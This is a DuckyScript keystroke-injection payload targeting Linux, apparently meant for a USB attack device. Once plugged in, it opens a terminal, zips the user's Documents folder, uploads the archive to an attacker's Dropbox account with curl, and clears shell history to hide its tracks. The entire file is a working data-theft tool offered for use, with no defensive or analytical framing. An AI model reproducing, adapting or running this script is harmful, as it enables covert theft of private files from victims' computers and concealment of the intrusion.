REM #########################################################
REM #                                                       |
REM # Title        : Exfiltrate Linux Content With Dropbox  |
REM # Author       : Aleff                                  |
REM # Version      : 1.0                                    |
REM # Category     : Exfiltration                           |
REM # Target       : Linux                                  |
REM #                                                       |
REM #########################################################

REM Requirements:
REM     - Internet Connection
REM     - Dropbox Account
REM     - - DROPBOX_ACCESS_TOKEN


DELAY 1000
CTRL-ALT t

DELAY 2000
REM Required: Set here your Dropbox access TOKEN
STRING ACCESS_TOKEN="YOUR_TOKEN"
ENTER

DELAY 500
STRING USER_NAME=$(whoami)
ENTER

DELAY 500
STRING path="/home/$USER_NAME/Documents"
ENTER

DELAY 500
STRING RANDOM=$(shuf -i 1-999999999999 -n 1)
ENTER

DELAY 500
STRING NAME="$RANDOM.zip"
ENTER

DELAY 500
STRING ZIP_PATH="$path/$NAME"
ENTER

DELAY 500
REM The FOLDER that you want to zip, in this example you want to zip all Documents content
STRING FOLDER="/home/$USER_NAME/Documents/"
ENTER

REM Delay for zipping operation, it depends by computer power and folder directory
DELAY 10000

DELAY 500
STRING if [ -r "$FOLDER" ]; then
ENTER
STRING zip -r "$ZIP_PATH" "$FOLDER" > /dev/null 2>&1
ENTER
STRING else
ENTER
STRING echo   ""
ENTER
STRING fi
ENTER

DELAY 500
STRING DROPBOX_FOLDER="/$NAME"
ENTER


DELAY 500
STRING curl -X POST https://content.dropboxapi.com/2/files/upload --header "Authorization: Bearer $ACCESS_TOKEN" --header "Dropbox-API-Arg: {\"path\": \"$DROPBOX_FOLDER\",\"mode\": \"add\",\"autorename\": true,\"mute\": false}" --header "Content-Type: application/octet-stream" --data-binary "@$ZIP_PATH"
ENTER

DELAY 2000
STRING history -c
ENTER
